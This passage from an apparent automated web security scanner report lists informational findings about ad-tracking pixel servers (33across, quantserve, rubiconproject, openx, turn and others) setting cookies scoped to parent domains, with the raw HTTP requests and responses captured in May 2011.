le1LqIaeqhuIk5hQJ7YxjXLB7GA==; Domain=.revsci.net; Expires=Tue, 08-May-2012 13:59:45 GMT; Path=/
Set-Cookie: NETSEGS_J06575=bff01c00ddc153c5&J06575&0&4decdd51&0&&4dc619e1&271d956a153787d6fee9112e9c6a9326; Domain=.revsci.net; Expires=Mon, 06-Jun-2011 13:59:45 GMT; Path=/
X-Proc-ms: 13
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: image/gif
Content-Length: 43
Date: Mon, 09 May 2011 13:59:44 GMT

GIF89a.............!.......,...........D..;
9.72. http://pixel.33across.com/ps/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.33across.com
Path:   /ps/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ps/?pid=454&uid=4dab4fa85facd099 HTTP/1.1
Host: pixel.33across.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh41.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 33x_ps=u%3D7527692047%3As1%3D1303122295815%3Ats%3D1304471552277%3As2.33%3D%2C3390%2C2740%2C

Response

HTTP/1.1 200 OK
P3P: CP='NOI DSP COR NID PSA PSD OUR IND UNI COM NAV INT DEM STA'
Set-Cookie: 33x_ps=u%3D7527692047%3As1%3D1303122295815%3Ats%3D1304949937737%3As2.33%3D%2C8131%2C4401%2C2751%2C8801%2C8261%2C6571%2C3831%2C7051%2C7651%2C6561%2C7661%2C2740%2C4411%2C9221%2C7671%2C9241%2C8151%2C5481%2C571%2C6581%2C8771%2C7621%2C8291%2C8301%2C6531%2C8171%2C2231%2C8781%2C4381%2C3321%2C7101%2C8311%2C8791%2C5451%2C8181%2C4911%2C7641%2C5441%2C2811%2C3761%2C7591%2C5911%2C2801%2C4472%2C7111%2C3771%2C5431%2C7131%2C5902%2C1051%2C3202%2C5421%2C4451%2C6651%2C4461%2C5411%2C7121%2C8761%2C2791%2C5891%2C6641%2C4941%2C8101%2C8711%2C581%2C8231%2C3741%2C5941%2C7561%2C8111%2C7141%2C4441%2C1061%2C591%2C7161%2C2761%2C8241%2C6621%2C4421%2C5391%2C8721%2C4431%2C601%2C3241%2C5921%2C3721%2C8121%2C7581%2C5381%2C5021%2C3161%2C3711%2C7531%2C8391%2C8001%2C5012%2C7521%2C6111%2C5601%2C6931%2C7541%2C6091%2C6941%2C6461%2C8041%2C5591%2C6951%2C6131%2C8431%2C3193%2C5051%2C6411%2C8421%2C4501%2C5572%2C6961%2C8061%2C4492%2C6421%2C6121%2C7511%2C4481%2C5581%2C8051%2C3171%2C6431%2C2571%2C6971%2C8331%2C6501%2C5552%2C5081%2C201%2C6981%2C2141%2C8871%2C8321%2C6511%2C6991%2C7461%2C4592%2C6041%2C5071%2C7961%2C4581%2C7001%2C8881%2C8341%2C5061%2C6471%2C7011%2C6071%2C231%2C2651%2C5111%2C7971%2C6051%2C7031%2C6481%2C5512%2C7991%2C6491%2C8851%2C6331%2C7891%2C2441%2C3521%2C4071%2C2981%2C8541%2C6321%2C5221%2C9081%2C7901%2C3541%2C8512%2C2461%2C9061%2C7881%2C3551%2C6791%2C2452%2C7381%2C7921%2C4101%2C5192%2C6841%2C5731%2C7931%2C2951%2C6291%2C7391%2C9051%2C3561%2C8551%2C4051%2C6281%2C2491%2C2971%2C7361%2C5211%2C3571%2C4671%2C2481%2C3581%2C7373%2C5751%2C4061%2C2961%2C7831%2C341%2C7351%2C9011%2C8471%2C4681%2C6391%2C9021%2C2501%2C4691%2C6862%2C3071%2C5181%2C7811%2C5171%2C7821%2C3481%2C4031%2C6851%2C6371%2C7341%2C9001%2C3491%2C7861%2C5131%2C6361%2C4711%2C8501%2C7321%2C5121%2C7871%2C8991%2C3501%2C6901%2C8481%2C4721%2C7301%2C7841%2C5151%2C3511%2C5682%2C361%2C7851%2C5141%2C8971%2C5351%2C8671%2C7771%2C4751%2C2311%2C7291%2C4271%2C2851%2C5831%2C9202%2C8661%2C4741%2C951%2C6201%2C7281%2C6661%2C4281%2C2871%2C5842%2C4761%2C6181%2C5361%2C8641%2C6191%2C7751%2C7261%2C6711%2C8701%2C5861%2C921%2C6171%2C5871%2C3911%2C5321%2C4771%2C8691%2C7251%2C5332%2C4251%2C9162%2C7791%2C6691%2C8682%2C6151%2C431%2C4791%2C6701%2C5881%2C421%2C7781%2C2841%2C9151%2C8601%2C7711%2C3881%2C3341%2C4801%2C7701%2C5771%2C7221%2C5781%2C4351%2C6721%2C9131%2C2932%2C6241%2C7691%2C8591%2C5791%2C4341%2C2941%2C5311%2C7681%2C3351%2C451%2C6733%2C9122%2C3891%2C6771%2C5251%2C3851%2C3362%2C9111%2C6232%2C5261%2C8631%2C5801%2C3841%2C7191%2C971%2C3871%2C9101%2C5811%2C7181%2C2901%2C5271%2C6211%2C7721%2C3390%2C7171%2C961%2C4311%2C6761%2C5821%2C3861%2C9091%2C; Domain=.33across.com; Expires=Tue, 08-May-2012 14:05:37 GMT; Path=/
Pragma: no-cache
Cache-Control: no-store, no-cache, must-revalidate
Expires: Thu, 01-Jan-70 00:00:01 GMT
X-33X-Status: 0
Content-Type: image/gif
Content-Length: 43
Date: Mon, 09 May 2011 14:05:37 GMT
Connection: close
Server: 33XG1

GIF89a.............!...
...,...........L..;
9.73. http://pixel.invitemedia.com/data_sync  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.invitemedia.com
Path:   /data_sync

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /data_sync?partner_id=64 HTTP/1.1
Host: pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?7DlEAJUeFQAKf3sAAAAAACSrHgAAAAAAAgAAAAQAAAAAAP8AAAACCtSXIQAAAAAAO1ciAAAAAABSbigAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACvfA0AAAAAAAIAAwAAAAAAPQrXo3A9.j.NzMzMzEwoQM3MzMzMzABAAAAAAAAAK0DNzMzMzMwAQAAAAAAAACtAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAANvP6S5dcQCvvERZXEb1jB5Wo9UMMB68IBgYBOAAAAAA==,,http%3A%2F%2Fwww.surphace.com%2Fads%2Frubicon_orlandosentinel,Z%3D468x60%26s%3D1384085%26_salt%3D2430113711%26B%3D10%26u%3Dhttp%253A%252F%252Fwww.surphace.com%252Fads%252Frubicon_orlandosentinel%26r%3D0,a481febc-7a44-11e0-9004-734ea9a602b1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=8218888f-9a83-4760-bd14-33b4666730c0; exchange_uid=eyIyIjogWyIyNzI0Mzg2MDE5MjI3ODQ2MjE4IiwgNzM0MjQ1XSwgIjQiOiBbIkNBRVNFQ0NyZjVYQkMyTExTQ3BjRWRBVjNzVSIsIDczNDI0NF19; dp_rec="{\"1\": 1304340350+ \"3\": 1304301926+ \"2\": 1304243633+ \"5\": 1304340362+ \"4\": 1304340367}"; partnerUID="eyIzOCI6ICJ1JTNENzUyNzY5MjA0NyUzQXMxJTNEMTMwMzEyMjI5NTgxNSUzQXRzJTNEMTMwNDI4MDI3NzY0NiUzQXMyLjMzJTNEJTJDMjc0MCUyQyIsICIxOTkiOiBbIkJERkJGRkMyMzFBMjgyRDZFMjQ0NUI4RTRERTRBMkUwIiwgdHJ1ZV0sICI0OCI6IFsiNjIxMDk0NzA0Nzc4NjMwMDI2ODI4MzM4NDI2NDg1NDcxMjI4NzAiLCB0cnVlXSwgIjE5NSI6IFsiMGNiYzVmNWMtZTNlYi1lMTJkLTJjMDYtZWQ3YzQwYjE5ZTkwIiwgdHJ1ZV0sICIxOTEiOiBbIjM3MDY2OTIzNDc1MTUzNTYzNTkiLCB0cnVlXSwgIjc5IjogWyIxNzU0YmI2NTA2MjNjNWJlNDNmY2EwYjU3YzM5MTBkOSIsIHRydWVdLCAiODQiOiBbIlE0emd2bldzOTk5clRTaEIiLCB0cnVlXX0="; subID="{}"; impressions="{\"591275\": [1304301926+ \"Tb4RXwAHNm8K5ovHrlhLbw==\"+ 62899+ 25126+ 2261]+ \"578963\": [1303562003+ \"28aaa692-ea2e-30b9-be12-340089999af0\"+ 3241+ 40652+ 138]+ \"591270\": [1304243633+ \"Tb0trgAIvYcK5XcWpVIMAw==\"+ 62896+ 25126+ 11582]+ \"610342\": [1304340532+ \"e4261c72-f3c7-37cd-b374-fe89df8a4a7b\"+ 12203+ 58117+ 4038]+ \"593710\": [1304340527+ \"3fd8060e-86f9-3d78-848d-3cf86700b5f3\"+ 8863+ 40494+ 4038]+ \"405594\": [1303072666+ \"2eefac09-883b-3f77-a8a9-19e6aac05dc5\"+ 22487+ 106641+ 227]+ \"619680\": [1304542089+ \"3899594795659691748\"+ 4456+ 6017+ 11823]+ \"610341\": [1304340492+ \"7a7364c6-4495-3fd9-9cd1-35e19873ff86\"+ 12208+ 58117+ 4038]}"; camp_freq_p1=eJzjkuFYeZZVgFGi83vbOxYFRo2Tz9vfsRgwWoD5XCIc9w6wCjBJbLnw6y2LAoMGgwGDBQNQ9MpnFqCe9Wiir4CiTBLPFv1AEV0xH2T+5L7TKKI77zMDRWfNX4sQBQBNEijP; io_freq_p1="eJzjEua4GiHAKNH5ve0diwGjBZjmEuZY7yrAJLHlwq+3LAoMGgwGDBYMQMHjgQLMEuvRBLeFArVP7juNIrjXBSg4a/5ahCAAdLEcdQ=="; segments_p1="eJzjYuZojOBi4Wj6zwQkm4EkEwcHkNXZwczFzDFRBcic9JQJyJxuDGTO/AFSNQdMzv0BEl4QDGSu3c8IZG4sBjJ37GLk4uLYuY9Z4NDBZe9YgOw9QPb3FduBbBaOve9BCvf7AZkHuxmB5KEjIEOO5gCZx5+ATD0BJk+CzT6dAyTOgeQufAeJXtwLIp9cAGl8sZsZSL7cBxJ5C2a/OwBy8T8OoJV/tjEJ7H7+DGglUCAcAECUP/o="

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 09 May 2011 14:00:14 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Mon, 09-May-2011 13:59:54 GMT
Content-Type: text/html
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: dp_rec="{\"1\": 1304340350+ \"3\": 1304301926+ \"2\": 1304949614+ \"5\": 1304340362+ \"4\": 1304340367}"; Domain=invitemedia.com; expires=Tue, 08-May-2012 14:00:14 GMT; Path=/
Content-Length: 508
Set-Cookie: dps2b=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; Max-Age=14400

<html>
<body>
<script type="text/javascript">
makePixelRequest("http://r.nexac.com/e/getdata.xgi?dt=fi&fn=adrider&pkey=tubw72p3ncbzv&repequal=-&reppipe=%26code%3D","javascript"
...[SNIP]...
9.74. http://pixel.quantserve.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /pixel

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel;r=1302356071;fpan=1;fpa=P0-1958234894-1304949604185;ns=1;url=http%3A%2F%2Fwww.surphace.com%2Fads%2Frubicon_orlandosentinel;ref=http%3A%2F%2Fwww.orlandosentinel.com%2Fbusiness%2Fos-cfb-cover-casey-tv-20110509%2C0%2C6839926.story;ce=1;je=1;sr=1920x1200x16;enc=n;ogl=;dst=1;et=1304949604184;tzo=300;a=p-25CIknq_eSg16;labels=MediaServices HTTP/1.1
Host: pixel.quantserve.com
Proxy-Connection: keep-alive
Referer: http://www.surphace.com/ads/rubicon_orlandosentinel
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mc=4dab4f93-dea96-f475f-85ff7; d=EPgAJe8kjVmM-5GL0ZmY8frRi58oyBABvAEB2gaB9ACa0aOZWBDxiz0cxeKLPR1KLMUgsqNMEf4RDCAMHxCCAg0g4gCdE7tgqRksdDECEYILsywS0zgSggMC4ZShzCW1OfFABNIA6JIA4QC-ILZLEIJIstOUo4sj

Response

HTTP/1.1 302 Found
Connection: close
Location: http://segment-pixel.invitemedia.com/pixel?pixelID=50185&partnerID=134&clientID=5061&key=segment&pb=0
Set-Cookie: d=EPUAJe8kjVmM-5GL0ZmY8frRi58oyBABvQEB2gaB9ACa0aOZWBDxiz0cxeKLPR1KLMUgsqNMEf4RDCAMHxCCAg0g4gCdE7tgqRksdDECEYILsywS0zgSggMC4ZShzCW1OfFABNIA6JIAww0b4gtksQgkiy05SjiyMA; expires=Sun, 07-Aug-2011 14:00:05 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV"
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 0
Date: Mon, 09 May 2011 14:00:05 GMT
Server: QS

9.75. http://pixel.rubiconproject.com/tap.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.rubiconproject.com
Path:   /tap.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tap.php?v=4212&nid=1185&put=2931142961646634775&expires=60 HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2931142961646634775&rnd=8532944041141139446&fpid=12&nu=n&t=&sp=n&purl=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_2025=549188a1-a07c-4231-be94-7f725e1a19f7; au=GMMM871R-KIRO-10.208.77.156; put_2081=AM-00000000030620452; put_2146=6wa51p1zbco8b5ocw49utyfiu6fa98yq; put_1197=3419824627245671268; put_1430=c1e1301e-3a1f-4ca7-9870-f636b5f10e66; put_1185=2931142961646634775; put_2100=usr3fd49cb9a7122f52; csi9=3188005.js^1^1304340479^1304340479; put_1512=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; put_2101=8218888f-9a83-4760-bd14-33b4666730c0; put_1523=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC; put_2132=978972DFA063000D2C0E7A380BFA1DEC; lm="2 May 2011 12:48:41 GMT"; put_1994=xrd52zkwjuxh; khaos=GMMM8SST-B-HSA1; csi15=3153732.js^1^1304367467^1304367467&3166422.js^1^1304366186^1304366186&3140642.js^2^1304363213^1304364698&3167237.js^2^1304361606^1304361617&3200915.js^1^1304360968^1304360968&3203914.js^3^1304360291^1304360963&3190993.js^3^1304358760^1304359002&3151969.js^2^1304340485^1304341092&3151966.js^2^1304340392^1304340510&3199969.js^1^1304340482^1304340482&3186719.js^2^1304340387^1304340476&3188306.js^1^1304340471^1304340471&3196947.js^1^1304340427^1304340427&3201778.js^1^1304340414^1304340414&3151650.js^3^1304340335^1304340359; ruid=154dab7990adc1d6f3372c12^8^1304807875^2915161843; csi2=3204821.js^1^1304807875^1304807875; rpb=5328%3D1%265671%3D1%264210%3D1%265852%3D1%264214%3D1%262939%3D1%264140%3D1%264212%3D1%264554%3D1%266073%3D1%264222%3D1%266286%3D1%262786%3D1%264940%3D1%262372%3D1%262111%3D1%262202%3D1%262110%3D1%262112%3D1%263810%3D1%262374%3D1%265864%3D1%265487%3D1%266552%3D1%264894%3D1; rpx=5328%3D11319%2C0%2C1%2C%2C%265671%3D11319%2C0%2C1%2C%2C%264212%3D11319%2C261%2C2%2C%2C%266286%3D11319%2C349%2C2%2C%2C%262372%3D11319%2C0%2C1%2C%2C%262374%3D11319%2C0%2C1%2C%2C%266073%3D11319%2C349%2C3%2C%2C%264210%3D11319%2C0%2C1%2C%2C%265852%3D11319%2C0%2C1%2C%2C%264222%3D11319%2C349%2C3%2C%2C%264894%3D11396%2C402%2C3%2C%2C%264554%3D11415%2C242%2C3%2C%2C%264214%3D11415%2C0%2C1%2C%2C%262939%3D11502%2C0%2C3%2C%2C%264140%3D11530%2C3%2C6%2C%2C%266552%3D11532%2C191%2C3%2C%2C%262786%3D11669%2C0%2C1%2C%2C%262111%3D11669%2C0%2C1%2C%2C%262112%3D11669%2C0%2C1%2C%2C%262202%3D11669%2C0%2C1%2C%2C%263810%3D11669%2C0%2C1%2C%2C%264940%3D11670%2C0%2C1%2C%2C%265864%3D11678%2C0%2C1%2C%2C%262110%3D11678%2C0%2C1%2C%2C%265487%3D11723%2C0%2C1%2C%2C; put_1986=2724386019227846218; cd=false

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:00:12 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=5328%3D1%265671%3D1%264210%3D1%265852%3D1%264214%3D1%262939%3D1%264140%3D1%264554%3D1%266073%3D1%264222%3D1%266286%3D1%262786%3D1%264940%3D1%262372%3D1%262111%3D1%262202%3D1%262110%3D1%262112%3D1%263810%3D1%262374%3D1%265864%3D1%265487%3D1%266552%3D1%264894%3D1%264212%3D1; expires=Wed, 08-Jun-2011 14:00:12 GMT; path=/; domain=.rubiconproject.com
Set-Cookie: rpx=5328%3D11319%2C0%2C1%2C%2C%265671%3D11319%2C0%2C1%2C%2C%264212%3D11319%2C519%2C3%2C%2C%266286%3D11319%2C349%2C2%2C%2C%262372%3D11319%2C0%2C1%2C%2C%262374%3D11319%2C0%2C1%2C%2C%266073%3D11319%2C349%2C3%2C%2C%264210%3D11319%2C0%2C1%2C%2C%265852%3D11319%2C0%2C1%2C%2C%264222%3D11319%2C349%2C3%2C%2C%264894%3D11396%2C402%2C3%2C%2C%264554%3D11415%2C242%2C3%2C%2C%264214%3D11415%2C0%2C1%2C%2C%262939%3D11502%2C0%2C3%2C%2C%264140%3D11530%2C3%2C6%2C%2C%266552%3D11532%2C191%2C3%2C%2C%262786%3D11669%2C0%2C1%2C%2C%262111%3D11669%2C0%2C1%2C%2C%262112%3D11669%2C0%2C1%2C%2C%262202%3D11669%2C0%2C1%2C%2C%263810%3D11669%2C0%2C1%2C%2C%264940%3D11670%2C0%2C1%2C%2C%265864%3D11678%2C0%2C1%2C%2C%262110%3D11678%2C0%2C1%2C%2C%265487%3D11723%2C0%2C1%2C%2C; expires=Wed, 08-Jun-2011 14:00:12 GMT; path=/; domain=.pixel.rubiconproject.com
Set-Cookie: put_1185=2931142961646634775; expires=Fri, 08-Jul-2011 14:00:12 GMT; path=/; domain=.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;
9.76. http://r.openx.net/set  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.openx.net
Path:   /set

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /set?pid=21a19823-5de3-4917-bc81-a4edea5127ff&rtb=2931142961646634775 HTTP/1.1
Host: r.openx.net
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2931142961646634775&rnd=8532944041141139446&fpid=12&nu=n&t=&sp=n&purl=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: i=02dd71c0-6aac-4019-82e3-049e51d96c25; s=ff27bad6-6196-4fc3-ac7a-4d20dad87fe5; p=1304949602

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:00:09 GMT
Server: Apache
Cache-Control: public, max-age=30, proxy-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: i=02dd71c0-6aac-4019-82e3-049e51d96c25; expires=Wed, 08-May-2013 14:00:09 GMT; path=/; domain=.openx.net
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;
9.77. http://r.turn.com/r/bd  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.turn.com
Path:   /r/bd

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/bd?ddc=1&pid=18&uid=CAESEA4m3NbIVFSubIriNyJB6xg&cver=1 HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2931142961646634775&rnd=8532944041141139446&fpid=12&nu=n&t=&sp=n&purl=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=Dza9cImQIgAOYp1sdVBFKJ3j2mm-3nw5DLdjMDY9RiDfaqaDzVRu9ZiuBStYaftY-vQa-Lrt8AEh2sMWSofalPWfoLMBxH0g9IiAwEZtd5YPMEpw2Dimbl_Ar_3pbVlWCr9zpcNmhJ4YALFsRS0OjTgV6OPboE5AailwYD2p-IySdlkZutLQ7ZQ85RG7C4VB2qlA743KvZ39ywpdZbpMhh0Lmtiu91APHHd__cAh9gz07Cd5Zg6Jg2z-OuW7NiYiFK2x3qhPSvxxgQjvFMzvNsv0sG_uSycuZycGHG0i9JDVJjS_HVyCCR3CpH4C_z7OWENSx6qTFa7od7SUHN9Egei6BZRgi_D5YzTOICCuYCx9jiGo5Ucxoan5H4AQ_xV3iHql4u4O7_sSYdnd02k2DNQHkfpT4yC0sBHWKifDZRo8VXe-PeWk1nfFtbmH7GvZ1QMXO5GUno07zoygwBocRoTsxUcxWk5nbrSqN6k58j1TORmwcQ4tlm0RwihyF_UsCL2x9N8rCbkNMc9dtlOLKF16IBansyDt77nh-l623XjbgLPXgE5UhrKbb-yapi7Iz_t1m3RC9HNVGEroWY24Hx0ymz9iB_PZ274hwZ5aW0QB1cBEZ955Qck8jqa4MZ7v1aY1ttiEjhYPnmeJ7sqVaGWGUflWpKK8ZDluGXe-OMAMpHNeDinV6bUD4c7xTKPYqOV7QZ7aFBA3m0phFzvLGUyTINTvrbznNuEHAKkRnaoKqQQIp4dB6WERi9SKRUeAKB26GseFkfH7OU-Y9jArFwJN1aNKu26HMlC2vlBlEo3AibJolRtP9GKY2j0AIA4QF0ROUKwFAxzf5GHHC-l2sUbwMrieaxWXba1ERSK3tWWrKuMIkiwSl3Te1VhilaTSnNbIlFewbQ0HwOyAYWPKVOFzsrgdqMMSA-afxC3bSvIKc60386S8NF-JuqnS_gYeiHql4u4O7_sSYdnd02k2DGktwZFEgr-H1aRa-v8iL2Y8VXe-PeWk1nfFtbmH7GvZojS9aaLdC4dIDTz1p5oDzGZlZrZQz9gqPi_YpBWRR_zyJstfeR3BF0X80yINyf_bnscLz8pWZl03MCHITMyErF16IBansyDt77nh-l623XgQrvHzCa6-Ar3OKf1u5O9co8jF4KazkjYUhi9Y-2cpubMeTwvrsn6UDDgstfmlQPoNQYQoyiD68kJjw-yNw0ZU1aY1ttiEjhYPnmeJ7sqVaHrw4FE_cCyjpsbZ3unV7uMrdoKrhpnovF-eFvpriEhVrMfpGoruuBgzA1-jEhdCS2wFnaEJ_77D-SBSvq4apv0KqQQIp4dB6WERi9SKRUeApAoLbAXgH3MAg4fG-53hwYWvZ7p1zrzJVM0-BhBuMNYrc7Kk7dBes7lnotHfeZ9VkUKGgPT-wupZmNTexU6iznjzwSpHwNAhjAO4xxi375pcdR85v5iezdnNkxnuNwjFRvAyuJ5rFZdtrURFIre1ZZBSlbvBC0evnYqUUsRvAsWc1siUV7BtDQfA7IBhY8pUNZFdTBAhalBFYq3Dyxi9TBfNNCsQZvwCdk93ue_PwR2IeqXi7g7v-xJh2d3TaTYMVxQyOpakzryCsBb1QMcxxTxVd7495aTWd8W1uYfsa9lUSQm6Px99bWr2RVRxuk2yEM0JJ22tYCLP7uBw8UeaI1M5GbBxDi2WbRHCKHIX9Sz_QtJiSnym5S_qsqKzl484XXogFqezIO3vueH6XrbdeBrsNvqpBtQW35VrocWM1hJEMrVYqmvz7xJtELJ71uRTTECD0HA2vYVMATXXOR4kic7TP4ECMD5bQt22Ufb1ASjVpjW22ISOFg-eZ4nuypVoX3-sqUKgtXKTyeeAJ3WoNBTpFHNeMdsJNdx7bmFAC56JAHYn97lyiGJ5XDJCkUNkw_be5i-Fx9NF-BKeFGAMPAqpBAinh0HpYRGL1IpFR4AB4o7EViaAPEO7EwRwSKXjmcb3GKio9SBOsgaqPfeFsasCu54shXpdyVhXu91m5wiW91g1mAzej0c7wnGxz5vZRvAyuJ5rFZdtrURFIre1ZfDRnDTWzff-YlyXP_zUgfGc1siUV7BtDQfA7IBhY8pUeWxnJe61Raa9uTyiNiaLtdI3rxLW4kElZ2z2lu4o7hWIeqXi7g7v-xJh2d3TaTYML11pzoZIlFkYCIGVGm_tUjxVd7495aTWd8W1uYfsa9nlK9dyZVYIz5pmDpzdU80QQkZpM_cVFXYTcTTPOspL-TBLfO2ZZ5wOsMI8xMfjrvrnuyo8Yez2B_AzlVUYglieXXogFqezIO3vueH6XrbdeOZqLTJ2eUC5VtOBQseHiE81nClsShNFF0lz8B3FOROwHTKbP2IH89nbviHBnlpbRDDco7mBS3_DJ0ZnqsKZKeTVpjW22ISOFg-eZ4nuypVotMax7cw1A0lomZOewLLuUzHWvz6IKIMXKnKL80iX025NYG1qkKS0O8LGs7luRUbTpMVbMDENDpvIJh2_kOeZwWW0-b-WJf0ZFlMOgj84vlCimF9cP6eLyeThS4cELoZF7hIMY-yiS6od8aiwiVy6K8hyJ0-yKCmYc6DEnkoIDjLUURQ9jCbj0adNONAbHq6OIauKDPsVyaYkWyAz1a3QLsZ0HFEk9FUwZlIZoC4PKchFMfXO25PtkA1FJuDF1eIqRRk7NbH_3KXaXpegXdoohM0M5HiSWAEvqit8JfBxvjBBCecmNOFvmnxZXlybKUM3qIhRpr8zAond1hyHy2KCxQ9jRTaSUh9q8NAYC-8-qkSZEZsmx23qKVCrqZDyeipaIi4-WrfUh7IPblkcEwLIfWk4JnPVlR_zGm4PPqzfx4-ZPuIxR87K17SR-59M9UpIVvIMltY5lVfKu7zjIgIpMBKB2P8TaeZb5SMS1Kn2fJf0-MGZW4U9vWHTndk9ZYnTYKRbzB2AW8sPYtx1gLnWIDsYBLT8b4yTE_t-fjXYNBuH2MTsqi1WP1f5naPDjKNVGGv49osHpNOU5hR-g_XrO60jJc9MudtXKgUybYsjSwmSw3Whqt4otLu1R9f4pMroY6TrnX9AFtcCOq4KtB3OqN2gLia6NWPazuloW1Dp_gmgtfmkSSGnmz7Ck--msIbUItDCaX4V_0YzpDgobT5myGAQ1jpLDCI7HiZjNNO0_95EX9SUHeo0SvSjgEUZJK2gWAKmardOPRrryF1DhECcp1-YMQnoV4ZAArTQ0YurxnNN6cMRpOMh2nE5XzpH9jU_75X6gaFQNyuWz4EiPqighnBW1K7ySrDy2erbCyocIlO9iKCeGUvo-FRYRZN7b2HzshKpWim7EvVYj9LxNPbnlLRl7SF6Fz-Cqk4ilR2m1sd6XpoV6J-HdTmFEl8Fex_S_sTGaqkuGDnpWV_Epn14CgCD-1Od2j93-G993DJLn6laQk0A_YEjXCNxN4ufXJe2s8taXVc1ZwCaKwQ-ReuFBa_BvA0MPyd7JlyBvMOrx4RsY1dMYwNR_ohNoy9a29HQKTTBeSdexy7NjxMrQdbG848mPsvXEVp1Zp9tlw0PafTHwRamGgGanwtSRVH2wEa3NxSTCsrM00Brun6Qttnr